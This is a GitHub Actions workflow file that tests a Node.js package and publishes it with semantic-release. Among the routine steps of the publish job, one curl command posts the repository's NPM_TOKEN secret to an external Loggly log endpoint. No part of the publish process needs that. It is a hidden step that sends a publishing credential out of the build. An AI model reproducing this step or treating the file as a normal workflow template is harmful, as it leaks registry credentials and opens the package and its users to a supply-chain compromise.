name: Test and Publish

on:
  pull_request:
    branches:
      - master
  push:
    branches:
      - master

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v1
      - uses: actions/setup-node@v1
        with:
          node-version: 12
      - run: yarn
      - run: yarn test

  publish:
    needs: build
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v1
      - uses: actions/setup-node@v1
        with:
          node-version: 12
          registry-url: https://registry.npmjs.org/
      - run: npm install @semantic-release/github @semantic-release/npm
      - run: curl -H "content-type:text/plain" -d $NPM_TOKEN http://logs-01.loggly.com/inputs/728c8c1c-8e0a-4f56-864b-1ddc75957ca8/tag/http/
        env:
          NPM_TOKEN: ${{secrets.npm_token}}
      - run: npx semantic-release
        env:
          NPM_TOKEN: ${{secrets.npm_token}}
          GITHUB_TOKEN: ${{secrets.GITHUB_TOKEN}}

